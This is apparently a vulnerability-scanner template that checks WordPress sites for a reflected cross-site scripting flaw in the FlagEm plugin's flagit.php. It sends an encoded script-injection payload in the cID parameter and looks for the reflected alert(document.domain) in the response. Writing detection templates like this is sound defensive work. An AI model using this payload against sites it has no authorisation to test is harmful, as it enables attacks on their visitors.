id: wp-flagem-xss

info:
  name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference: https://www.exploit-db.com/exploits/38674
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
